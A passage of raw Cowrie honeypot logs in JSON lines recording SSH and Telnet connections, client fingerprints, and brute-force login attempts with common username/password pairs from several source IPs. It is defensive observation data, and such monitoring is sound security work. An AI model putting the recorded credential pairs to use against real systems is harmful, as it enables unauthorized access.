{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:52:52.736520Z","src_ip":"103.174.115.196","session":"98ecc5870156"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:52:52.920740Z","src_ip":"103.174.115.196","session":"9d7319b82c5a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:52:52.921785Z","src_ip":"103.174.115.196","session":"98ecc5870156"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.118.153","src_port":59914,"dst_ip":"1.2.3.4","dst_port":22,"session":"3eeb0dfda2e8","protocol":"ssh","message":"New connection: 14.103.118.153:59914 (1.2.3.4:22) [session: 3eeb0dfda2e8]","sensor":"my-vps","timestamp":"2025-08-24T22:53:06.777606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T22:53:06.778919Z","src_ip":"14.103.118.153","session":"3eeb0dfda2e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T22:53:06.961215Z","src_ip":"14.103.118.153","session":"3eeb0dfda2e8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:53:07.724638Z","src_ip":"14.103.118.153","session":"3eeb0dfda2e8"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:53:07.907035Z","src_ip":"14.103.118.153","session":"3eeb0dfda2e8"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":55570,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c09d374d4b9","protocol":"ssh","message":"New connection: 196.251.115.108:55570 (1.2.3.4:22) [session: 0c09d374d4b9]","sensor":"my-vps","timestamp":"2025-08-24T22:53:17.611392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:53:18.184620Z","src_ip":"196.251.115.108","session":"0c09d374d4b9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:53:18.185322Z","src_ip":"196.251.115.108","session":"0c09d374d4b9"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"111111","message":"login attempt [ubuntu/111111] failed","sensor":"my-vps","timestamp":"2025-08-24T22:53:21.433516Z","src_ip":"196.251.115.108","session":"0c09d374d4b9"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:53:22.677988Z","src_ip":"196.251.115.108","session":"0c09d374d4b9"}
{"eventid":"cowrie.session.connect","src_ip":"24.198.114.123","src_port":36990,"dst_ip":"1.2.3.4","dst_port":23,"session":"f63da9cc8cef","protocol":"telnet","message":"New connection: 24.198.114.123:36990 (1.2.3.4:23) [session: f63da9cc8cef]","sensor":"my-vps","timestamp":"2025-08-24T22:53:43.777886Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":33876,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f95b1dba9d2","protocol":"ssh","message":"New connection: 196.251.115.108:33876 (1.2.3.4:22) [session: 7f95b1dba9d2]","sensor":"my-vps","timestamp":"2025-08-24T22:54:05.236356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:54:06.022819Z","src_ip":"196.251.115.108","session":"7f95b1dba9d2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:54:06.023628Z","src_ip":"196.251.115.108","session":"7f95b1dba9d2"}
{"eventid":"cowrie.login.failed","username":"guest","password":"password","message":"login attempt [guest/password] failed","sensor":"my-vps","timestamp":"2025-08-24T22:54:10.232658Z","src_ip":"196.251.115.108","session":"7f95b1dba9d2"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:54:11.545216Z","src_ip":"196.251.115.108","session":"7f95b1dba9d2"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":42556,"dst_ip":"1.2.3.4","dst_port":22,"session":"1750fcbe5a3f","protocol":"ssh","message":"New connection: 196.251.115.108:42556 (1.2.3.4:22) [session: 1750fcbe5a3f]","sensor":"my-vps","timestamp":"2025-08-24T22:54:52.396323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:54:53.037798Z","src_ip":"196.251.115.108","session":"1750fcbe5a3f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:54:53.038548Z","src_ip":"196.251.115.108","session":"1750fcbe5a3f"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456789","message":"login attempt [guest/123456789] failed","sensor":"my-vps","timestamp":"2025-08-24T22:54:55.983412Z","src_ip":"196.251.115.108","session":"1750fcbe5a3f"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:54:57.354488Z","src_ip":"196.251.115.108","session":"1750fcbe5a3f"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":46926,"dst_ip":"1.2.3.4","dst_port":22,"session":"46b3a2b4aaef","protocol":"ssh","message":"New connection: 196.251.115.108:46926 (1.2.3.4:22) [session: 46b3a2b4aaef]","sensor":"my-vps","timestamp":"2025-08-24T22:55:38.790170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:55:39.284381Z","src_ip":"196.251.115.108","session":"46b3a2b4aaef"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:55:39.285291Z","src_ip":"196.251.115.108","session":"46b3a2b4aaef"}
{"eventid":"cowrie.login.failed","username":"guest","password":"12345","message":"login attempt [guest/12345] failed","sensor":"my-vps","timestamp":"2025-08-24T22:55:42.415186Z","src_ip":"196.251.115.108","session":"46b3a2b4aaef"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:55:43.743602Z","src_ip":"196.251.115.108","session":"46b3a2b4aaef"}
{"eventid":"cowrie.session.closed","duration":120.00123238563538,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:55:43.779036Z","src_ip":"24.198.114.123","session":"f63da9cc8cef"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52420,"dst_ip":"1.2.3.4","dst_port":22,"session":"9387b9fef735","protocol":"ssh","message":"New connection: 217.72.205.35:52420 (1.2.3.4:22) [session: 9387b9fef735]","sensor":"my-vps","timestamp":"2025-08-24T22:55:49.836382Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:55:49.837819Z","src_ip":"217.72.205.35","session":"9387b9fef735"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":53326,"dst_ip":"1.2.3.4","dst_port":22,"session":"e76b6bed17cf","protocol":"ssh","message":"New connection: 196.251.115.108:53326 (1.2.3.4:22) [session: e76b6bed17cf]","sensor":"my-vps","timestamp":"2025-08-24T22:56:26.873356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:56:27.134480Z","src_ip":"196.251.115.108","session":"e76b6bed17cf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:56:27.135151Z","src_ip":"196.251.115.108","session":"e76b6bed17cf"}
{"eventid":"cowrie.login.failed","username":"guest","password":"12345678","message":"login attempt [guest/12345678] failed","sensor":"my-vps","timestamp":"2025-08-24T22:56:30.618742Z","src_ip":"196.251.115.108","session":"e76b6bed17cf"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:56:31.918169Z","src_ip":"196.251.115.108","session":"e76b6bed17cf"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":59646,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c4a95746f25","protocol":"ssh","message":"New connection: 196.251.115.108:59646 (1.2.3.4:22) [session: 3c4a95746f25]","sensor":"my-vps","timestamp":"2025-08-24T22:57:15.702587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:57:16.065760Z","src_ip":"196.251.115.108","session":"3c4a95746f25"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:57:16.066518Z","src_ip":"196.251.115.108","session":"3c4a95746f25"}
{"eventid":"cowrie.login.failed","username":"guest","password":"qwerty","message":"login attempt [guest/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-24T22:57:18.851388Z","src_ip":"196.251.115.108","session":"3c4a95746f25"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:57:20.026453Z","src_ip":"196.251.115.108","session":"3c4a95746f25"}
{"eventid":"cowrie.session.closed","duration":"300.9","message":"Connection lost after 300.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:57:49.639229Z","src_ip":"14.103.118.153","session":"3bd53459ab26"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":38610,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fc1c90dee5e","protocol":"ssh","message":"New connection: 196.251.115.108:38610 (1.2.3.4:22) [session: 2fc1c90dee5e]","sensor":"my-vps","timestamp":"2025-08-24T22:58:02.815773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:58:03.368899Z","src_ip":"196.251.115.108","session":"2fc1c90dee5e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:58:03.369722Z","src_ip":"196.251.115.108","session":"2fc1c90dee5e"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123123","message":"login attempt [guest/123123] failed","sensor":"my-vps","timestamp":"2025-08-24T22:58:04.993600Z","src_ip":"196.251.115.108","session":"2fc1c90dee5e"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:58:06.850934Z","src_ip":"196.251.115.108","session":"2fc1c90dee5e"}
{"eventid":"cowrie.session.connect","src_ip":"199.45.154.146","src_port":41092,"dst_ip":"1.2.3.4","dst_port":23,"session":"7f7fb4f0bb49","protocol":"telnet","message":"New connection: 199.45.154.146:41092 (1.2.3.4:23) [session: 7f7fb4f0bb49]","sensor":"my-vps","timestamp":"2025-08-24T22:58:11.649881Z"}
{"eventid":"cowrie.session.closed","duration":15.678815364837646,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:58:27.328595Z","src_ip":"199.45.154.146","session":"7f7fb4f0bb49"}
{"eventid":"cowrie.session.connect","src_ip":"199.45.154.146","src_port":40542,"dst_ip":"1.2.3.4","dst_port":23,"session":"c7bf0761a319","protocol":"telnet","message":"New connection: 199.45.154.146:40542 (1.2.3.4:23) [session: c7bf0761a319]","sensor":"my-vps","timestamp":"2025-08-24T22:58:30.622534Z"}
{"eventid":"cowrie.session.closed","duration":3.1563053131103516,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:58:33.778734Z","src_ip":"199.45.154.146","session":"c7bf0761a319"}
{"eventid":"cowrie.session.connect","src_ip":"199.45.154.146","src_port":40550,"dst_ip":"1.2.3.4","dst_port":23,"session":"b542c3d7b2d2","protocol":"telnet","message":"New connection: 199.45.154.146:40550 (1.2.3.4:23) [session: b542c3d7b2d2]","sensor":"my-vps","timestamp":"2025-08-24T22:58:37.388529Z"}
{"eventid":"cowrie.session.closed","duration":10.148739576339722,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:58:47.537205Z","src_ip":"199.45.154.146","session":"b542c3d7b2d2"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":54460,"dst_ip":"1.2.3.4","dst_port":22,"session":"a316b5a30405","protocol":"ssh","message":"New connection: 196.251.115.108:54460 (1.2.3.4:22) [session: a316b5a30405]","sensor":"my-vps","timestamp":"2025-08-24T22:58:52.092881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:58:52.523711Z","src_ip":"196.251.115.108","session":"a316b5a30405"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 